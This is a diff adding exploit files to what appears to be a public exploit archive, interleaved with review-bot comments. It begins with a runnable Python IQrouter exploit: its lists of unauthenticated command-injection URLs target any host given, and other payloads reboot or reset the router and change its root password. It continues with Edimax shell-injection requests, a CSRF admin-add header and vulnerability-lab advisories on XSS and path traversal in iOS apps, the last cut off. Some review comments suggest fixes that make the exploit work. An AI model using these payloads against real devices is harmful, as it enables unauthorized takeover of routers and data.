"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/", + "RCE /diag_wifi (htm5ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/", + "RCE /diag_wifi (htm2ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/", + "RCE /diag_wifi (c5ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/", + "RCE /diag_wifi (c2ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/", + "RCE /diag_set_static_wan (static_ip param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/", + "RCE /diag_set_static_wan (net_mask param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/", + "RCE /diag_set_static_wan (gateway param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/", + "RCE /diag_set_static_wan (dns param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/", + "RCE /diag_set_static_modem (static_ip param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/", + "RCE /diag_set_static_modem (net_mask param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/", + "RCE /diag_set_static_modem (gateway param)" + ], + [ + "/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/", + "RCE /diag_set_device_name_and_sync (device_name param)" + ], + [ + "/cgi-bin/luci/er/diag_set_device_name/'`{}`'/", + "RCE /diag_set_device_name (device_name param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/", + "RCE /diag_pppoe_update (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/", + "RCE /diag_pppoe_update (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/", + "RCE /diag_pppoe (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/", + "RCE /diag_pppoe (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/", + "RCE /diag_pppoa_update (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/", + "RCE 
/diag_pppoa_update (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/", + "RCE /diag_pppoa (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/", + "RCE /diag_pppoa (wan_password param)" + ], + [ + "/cgi-bin/luci/er/advanced_link?link='`{}`'", + "RCE /advanced_link (link param)" + ] + +] + +advanced_payloads = [ + [ + "/cgi-bin/luci/er/reboot_link?reboot=1", + "Reboot IQrouter (/reboot_link reboot param))" + ], + [ + "/cgi-bin/luci/er/screen2?reboot=1", + "Reboot IQrouter (/screen2 reboot param))" + ], + [ + "/cgi-bin/luci/er/index?reset_config=1", + "Reset IQrouter (/index reset_config param)" + ], + [ + "/cgi-bin/luci/er/screen7?upgrade=1", + "Upgrade IQrouter (/screen7 upgrade param)" + ], + [ + "/cgi-bin/luci/er/vlanTag?restart_network=1", + "Restart network (/vlanTag restart_network param)" + ], + [ + "/cgi-bin/luci/er/diag_iperf_cmd/start", + "Start iperf script (/diag_iperf_cmd/start)" + ], + [ + "/cgi-bin/luci/er/diag_iperf_cmd/stop", + "Stop iperf script (/diag_iperf_cmd/stop)" + ], + [ + "/cgi-bin/luci/er/get_syslog", + "Router setup info log (/get_syslog)" + ], + [ + "/cgi-bin/luci/er/diag_set_password/c00lpasswd/", + "Change root password to c00lpasswd (can change in code)" + ], + [ + "/cgi-bin/luci/er/reset_password/", + "Change root password to 'changeme' (static)" + ] +] + + +def print_payloads(): + print('#' * 30) + print("Payloads list") + num = 1 + print('######################### RCE without auth ########################') + for payload in rce_any: + print("{} - {}".format(num, payload[1])) + num += 1 + + print( + '############### RCE (router need to be in setup mode) ###############') + for payload in rce_setup: + print("{} - {}".format(num, payload[1])) + num += 1 + + print( + '######################### Advanced payloads #########################') + for payload in advanced_payloads: + print("{} - {}".format(num, payload[1])) + num += 1 + + +parser = argparse.ArgumentParser(description="IQrouter 
multiple RCE") +parser.add_argument('--host', help='Host', type=str) +parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int) +parser.add_argument('-n', '--num', help='Payload number', + default=0, type=int) +parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)', + default="pwd", type=str) +parser.add_argument('--protocol', help='Protocol (http/https)', + default="http", type=str) + +args = parser.parse_args() + + +def main(): + print("") + full_payload_list = rce_setup + rce_any + advanced_payloads + payloads_amount = len(full_payload_list) + try: + hostname = args.host + port = args.port + payload_num = int(args.num) + bash_cmd = args.cmd + protocol = args.protocol + + if payload_num < 1 or payload_num > payloads_amount: + print("Error with payload number!") + raise IndexError + if port < 0 or port > 65535: + print("Error with port number") + raise IndexError + if protocol not in ['http', 'https']: + print("Error with protocol name") + raise IndexError + + current_payload = full_payload_list[payload_num - 1] + print("Payload: {}".format(current_payload[1])) + print("Host: {}".format(hostname)) + print("Port: {}".format(port)) + print("Protocol: {}".format(protocol)) + print("Command: {}".format(bash_cmd)) + + full_url = "{}://{}:{}{}".format(protocol, hostname, port, + current_payload[0].format(bash_cmd)) + print("Built URL: {}".format(full_url)) + + r = requests.get(full_url) + print("Status code: {}".format(r.status_code)) + return + except IndexError: + parser.print_help() + print_payloads() + exit(1) + + +if __name__ == '__main__': + print( + "\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.") + exit(main()) \ No newline at end of file diff --git a/exploits/hardware/webapps/48362.txt b/exploits/hardware/webapps/48362.txt new file mode 100644 index 000000000..671415866 --- /dev/null +++ b/exploits/hardware/webapps/48362.txt 
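Review bot: The payload numbering printed by `print_payloads()` does not match what `main()` executes: the help lists `rce_any` first, then `rce_setup`, then `advanced_payloads`, but `main()` builds `full_payload_list = rce_setup + rce_any + advanced_payloads`, so `-n 1` runs the setup-mode `vlanTag` payload while the help says 1 is `/wifi (s2 param)`; the fix is `full_payload_list = rce_any + rce_setup + advanced_payloads`. `--host` is not `required=True`, so omitting it produces a URL with `None` as the host instead of a usage error, and `requests.get(full_url)` has no `timeout=` and no `verify=False` even though `--protocol https` is accepted, so a router with a self-signed certificate fails with an SSL error. The `/screen11.1` payload appears here as `®ister=123`, which looks like an HTML-entity rendering artifact of `&register=123` rather than the script's text.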
@@ -0,0 +1,90 @@ +# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin) +# Google Dork:jizhicms +# Date: 2020-04-18 +# Exploit Author: iej1ctk1g +# Product web page: https://www.p5.hu +# Affected version: 1.0.20, 1.0.11 +# CVE : N/A + + + + + + + +
+ + + + + + + +
+ + + + + + +
+ + + + +
+ + + + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/48365.txt b/exploits/hardware/webapps/48365.txt new file mode 100644 index 000000000..c8a33a664 --- /dev/null +++ b/exploits/hardware/webapps/48365.txt @@ -0,0 +1,94 @@ +# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password) +# Date: 2020-04-21 +# Exploit Author: Besim ALTINOK +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Version:1.13 +# Tested on: Edimax EW-7438RPn 1.13 Version + +----------------------------- +Here step by step : + + 1. I did Setup + 2. After setup try to access to *wlencrypt_wiz.asp* file + 3. After access to this file, I saw some information disclosure +(Like *WiFi Password*) + 4. Here is the all leak here: + +------------------------------- + + +
+ + + + + + + + +
+ + + +-- + +Besim ALTINOK + +*Security Engineer* \ No newline at end of file diff --git a/exploits/hardware/webapps/48377.txt b/exploits/hardware/webapps/48377.txt new file mode 100644 index 000000000..6d6bf69e5 --- /dev/null +++ b/exploits/hardware/webapps/48377.txt @@ -0,0 +1,75 @@ +# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution +# Date: 2020-04-23 +# Exploit Author: Besim ALTINOK +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Version:1.13 +# Tested on: Edimax EW-7438RPn 1.13 Version + +------ + +NOTE: This device configurated with root permissions. So you can run the +command as root + +Here is the detail(s) of the RCE(s) + +1- Content of the mp.asp file + +
+   +   +   +
+ +RCE Detail: +------------------------------- + +POST /goform/mp HTTP/1.1 +Host: 192.168.2.2 +User-Agent: Mozilla/5.0 ********************* +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 25 +DNT: 1 +Authorization: Basic YWRtaW46MTIzNA== +Connection: close +Cookie: language=1 +Upgrade-Insecure-Requests: 1 + +command=||busybox+ls&getID= + +------------------------------- + +2- Content of the syscmd.asp + +
+ +This page can be used to run target system command. +
+ + + + + +RCE Detail: +------------------------------- + +POST /goform/formSysCmd HTTP/1.1 +Host: 192.168.2.2 +User-Agent: Mozilla/5.0 ********************* +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 11 +DNT: 1 +Authorization: Basic YWRtaW46MTIzNA== +Connection: close +Cookie: language=1 +Upgrade-Insecure-Requests: 1 + +sysCmd="command to here" \ No newline at end of file diff --git a/exploits/ios/webapps/48321.txt b/exploits/ios/webapps/48321.txt new file mode 100644 index 000000000..833bae26a --- /dev/null +++ b/exploits/ios/webapps/48321.txt 
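Review bot: Both requests carry `Authorization: Basic YWRtaW46MTIzNA==` (`admin:1234`), so what is demonstrated is authenticated command execution with the factory-default password, and the title should say "Authenticated"; the `syscmd.asp` page is described in the listing itself as "This page can be used to run target system command", i.e. an intended diagnostic shell, so the `formSysCmd` item is a privilege finding (a root-level command prompt exposed to the web admin) rather than an injection bug. The `/goform/mp` case, `command=||busybox+ls&getID=`, is the one that shows shell metacharacters reaching a shell unsanitized, and it deserves to be separated from the `syscmd.asp` case in the write-up.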
@@ -0,0 +1,417 @@ +# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: http://www.app2pro.com +# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 +# CVE: N/A + +Document Title: +=============== +AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2203 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2203 + + +Common Vulnerability Scoring System: +==================================== +4.5 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +File sharing with other iOS devices via Bluetooth or Wi-Fi connection +with automatic search of nearest devices. +Users can perform file operations on the application like: Copy, Move, +Zip, Unzip, Rename, Delete, Email, and more. +Easy to create file like: Text File, New folder, Playlist, Take +Photo/Video, Import From Library, and Voice Record. +AirDisk Pro allows you to store, view and manage files on your iPhone, +iPad or iPod touch. You can connect to AirDisk +Pro from any Mac or PC over the Wi-Fi network and transfer files by drag +& drop files straight from the Finder or Windows +Explorer. AirDisk Pro features document viewer, PDF reader, music +player, image viewer, voice recorder, text editor, file +manager and support most of the file operations: like delete, move, +copy, email, share, zip, unzip and more. 
+ +(Copy of the Homepage: +https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 ) +(Copy of the Homepage: http://www.app2pro.com ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile +application. + + +Affected Product(s): +==================== +Felix Yew +Product: AirDisk Pro v5.5.3 (iOS) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +No authentication (guest) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site scripting vulnerability has been +discovered in the official SuperBackup v2.0.5 ios mobile application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise the mobile +web-application from the application-side. + +The first vulnerability is located in the `createFolder` parameter of +the `Create Folder` function. Attackers are able to name +or rename paths via airdisk pro ui to malicious persistent script codes. +Thus allows to execute the persistent injected script +code on the front site of the path index listing in the content itself +on each refresh. The request method to inject is POST +and the attack vector is located on the application-side. Interaction to +exploit is as well possible through the unauthenticated +started ftp service on the local network. 
+ +The second vulnerability is located in the `deleteFile` parameter of the +`Delete` function. The output location with the popup +that asks for permission to delete, allows to execute the script code. +The injection point is the file parameter and the execution +point occurs in the visible delete popup with the permission question. +The request method to inject is POST and the attack vector +is located on the application-side. + +The third web vulnerability is located in the `devicename` parameter +that is displayed on the top next to the airdisk pro ui logo. +Remote attackers are able to inject own malicious persistent script code +by manipulation of the local apple devicename information. +The injection point is the devicename information and the execution +point occurs in the file sharing ui panel of the airdisk pro +mobile web-application. + +Remote attackers are able to inject own script codes to the client-side +requested vulnerable web-application parameters. The attack +vector of the vulnerability is persistent and the request method to +inject/execute is POST. The vulnerabilities are classic client-side +cross site scripting vulnerabilities. Successful exploitation of the +vulnerability results in session hijacking, persistent phishing +attacks, persistent external redirects to malicious source and +persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] AirDisk pro Wifi UI + +Vulnerable Parameter(s): +[+] createFolder +[+] deleteFile +[+] devicename + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with wifi access with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +1. Create Folder + +PoC: Vulnerable Source + +
+
+ + + + +
System Command:
test11 Apr 2020 at 12:35Folder  + +
+ +test>" + + +PoC: Vulnerable Source (Listing - Index) + +

Contacts 09:17:12:PM 10:Apr.:2020 .vcf

+

26.40 KB

+
+ +
+ + + +PoC: Exception-Handling +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >" +09:17:12:PM 10:Apr.:2020 .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts 09:17:12:PM 10:Apr.:2020 >" .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >"09:17:12:PM 10:Apr.:2020 .vcf" + + +PoC: Exploit +BEGIN:VCARD +VERSION:3.0 +PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN +B:Kunz Mejri ;>" ;;; +END:VCARD + + +--- PoC Session Logs [POST] --- +http://localhost/move +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 187 +Origin: http://localhost +Connection: keep-alive +Referer: http://localhost/ +oldPath=/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf&newPath=/evil-filename>".vc +- +POST: HTTP/1.1 500 Internal Server Error +Content-Length: 593 +Content-Type: text/html; charset=utf-8 +Connection: Close +Server: GCDWebUploader +- +http://localhost/evil.source +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: http://localhost/ +- +GET: HTTP/1.1 200 OK +Server: GCDWebUploader +Connection: Close + + +Solution - Fix & Patch: +======================= +1. Parse and filter the vcf name values next to add, edit or imports to +prevent an execution +2. 
Restrict and filter in the index listing the vcf names to sanitize +the output + + +Security Risk: +============== +The security risk of the persistent vcf cross site scripting web +vulnerability is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/ios/webapps/48327.txt b/exploits/ios/webapps/48327.txt new file mode 100644 index 000000000..6063109bf --- /dev/null +++ b/exploits/ios/webapps/48327.txt 
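Review bot: The Technical Details paragraph says the issue was "discovered in the official SuperBackup v2.0.5 ios mobile application", which contradicts the title, abstract and Affected Product (AirDisk Pro v5.5.3) and looks like text carried over from another advisory; change it to `discovered in the official AirDisk Pro v5.5.3 iOS mobile application`. The Vulnerable Parameter list names `createFolder`, `deleteFile` and `devicename`, yet the only captured request is `POST /move` with `oldPath`/`newPath`, and the fix section talks about vcf names — the PoC should include a request to the listed endpoints (or the parameter list should name `newPath`) so a reader can reproduce what is claimed. The logged response is `500 Internal Server Error`, which shows the rename being rejected rather than the payload being stored, so a follow-up `GET /` showing the injected name rendered in the index listing is needed to back the "persistent" classification.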
@@ -0,0 +1,245 @@ +# Title: File Transfer iFamily 2.1 - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: http://www.dedecms.com/products/dedecms/downloads/ +# CVE: N/A + +Document Title: +=============== +File Transfer iFamily v2.1 - Directory Traversal Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2199 + + +Release Date: +============= +2020-04-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2199 + + +Common Vulnerability Scoring System: +==================================== +7.1 + + +Vulnerability Class: +==================== +Directory- or Path-Traversal + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Send photos, videos and documents to other devices without Internet. A +complete application to exchange files +wirelessly between devices. It uses the Multipeer Connectivity Framework +to search and connect to available devices, +without the need of internet connection or any kind of server and database. + +(Copy of the Homepage: +https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575 +) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a directory +traversal web vulnerability in the official File Transfer iFamily v2.1 +ios mobile application. 
+ + +Affected Product(s): +==================== +DONG JOO CHO +Product: File Transfer iFamily v2.1 - iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +No User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +A directory traversal web vulnerability has been discovered in the +official File Transfer iFamily v2.1 ios mobile application. +The vulnerability allows remote attackers to change the application path +in performed requests to compromise the local application +or file-system of a mobile device. Attackers are for example able to +request environment variables or a sensitive system path. + +The directory-traversal web vulnerability is located in the main +application path request performed via GET method. Attackers are +able to request for example the local ./etc/ path of the web-server by +changing the local path in the performed request itself. +In a first request the attack changes the path, the host redirects to +complete the adress with "..". Then the attacker just +attaches a final slash to its request and the path can be accessed via +web-browser to download local files. + +Exploitation of the directory traversal web vulnerability requires no +privileged web-application user account or user interaction. +Successful exploitation of the vulnerability results in information +leaking by unauthorized file access and mobile application compromise. 
+ + +Proof of Concept (PoC): +======================= +The directory traversal vulnerability can be exploited by attackers with +access to the wifi interface in a local network without user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information and steps below to continue. + + +PoC: Exploitation +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +http://localhost//../ + + +--- PoC Session Logs [GET]] --- +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 +- +http://localhost../etc/ +Host: localhost.. 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- add slash to correct host adress (/.././) +http://localhost/./ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- Access granted +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a restriction of the visible and +accessable ./etc/ path in the app container. +Disallow path changes in the client-side get method requests and +validate them securely. + + +Security Risk: +============== +The security risk of the directory travsersal web vulnerability in the +ios mobile application is estimated as high. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. 
Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ \ No newline at end of file diff --git a/exploits/ios/webapps/48340.txt b/exploits/ios/webapps/48340.txt new file mode 100644 index 000000000..2960d2761 --- /dev/null +++ b/exploits/ios/webapps/48340.txt 
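Review bot: The `# Software Link:` header points at dedecms.com, which is unrelated to this iOS app; the App Store URL the body already gives (`https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575`) should be used there. The PoC does not yet demonstrate a traversal: the "Access granted" response for `/../../../../…/` has the same `Content-Length: 2521` as the first, unremarkable listing, and a browser with the Firefox User-Agent shown normalises `..` segments client-side before sending, so the server most likely received `GET /`. The log should be re-captured with a client that sends the path as-is (a raw socket or `curl --path-as-is`) and should show content that can only come from outside the served directory, such as an `/etc/` listing. The `http://localhost../etc/` / `Host: localhost..` entry is a malformed URL rather than a request the server would resolve and should be dropped or explained.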
@@ -0,0 +1,423 @@ +# Title: Playable 9.18 iOS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034 +# CVE: N/A + +Document Title: +=============== +Playable v9.18 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2198 + + +Release Date: +============= +2020-04-16 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2198 + + +Common Vulnerability Scoring System: +==================================== +7.3 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Watch your MKV, MP4 and MOV movie files on your iPad, iPhone or iPod +Touch without conversion - +just copy files to your device through iTunes or over Wifi! To search +for closed captions / +subtitles select a video then press the magnifying glass icon to the top +right of the video. + +(Copy of the Homepage: +https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034 +) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +vulnerabilities in the official Playable v9.18 apple ios mobile application. 
+ + +Affected Product(s): +==================== +Portable Ltd +Product: Playable v9.18 - iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-16: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +1.1 +A persistent script code injection web vulnerability has been discovered +in the official Playable v9.18 apple ios mobile application. +The vulnerability allows remote attackers to inject own malicious +persistent script codes to the application-side for manipulation. + +The vulnerability is located in the filename parameter of the upload +module. Attackers with wifi access are able to perform uploads +with malicious script code to manipulation the mobile application ui. +The request method to inject is POST and the attack vector of +the vulnerability is persistent. Attackers are able to inject html and +javascript codes to comrpomise the mobile wifi web-application. +The injection point is the upload form on localhost:8881 and the +execution occurs on localhost:80 with the visible ui listing. + +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected mobile +application modules. + +Request Method(s): +[+] POST + +Vulnerable Function(s): +[+] upload + +Vulnerable Parameter(s): +[+] filename + + +1.2 +An arbitrary file upload web vulnerability has been discovered in the +official Playable v9.18 apple ios mobile application. 
+The arbitary file upload vulnerability allows remote attackers to upload +malicious files to compromise the mobile application. + +The vulnerability is located in the filename parameter of the upload +module. Attackers with wifi access are able to perform +uploads with malicious file extions to bypass the parse function. In a +second step the attacker requests the local file to +execute the malicious content on the local web-server. The request +method to inject is POST and the attack vector of the +vulnerability is located on the application-side. The injection point is +the upload form on localhost:8881. The execution +point becomes visible by a request the localhost:80/vid/[filename] path +with the uploaded file content. The is present +because of a missing file parse and insecure upload handling on file +extensions. As well the local web-server can be +reconfigured to provide more security on user interactions. + +Successful exploitation of the arbitrary file upload vulnerability +results in a compromise of the local ios mobile application. + +Request Method(s): +[+] POST + +Vulnerable Function(s): +[+] upload + +Vulnerable Parameter(s): +[+] filename + +Affected Module(s): +[+] /vid/ + + +Proof of Concept (PoC): +======================= +1.1 +The persistent script code injection vulnerability can be exploited by +remote attackers with wifi network access without user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Install the ios application +(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034) +2. Start the ios application on your 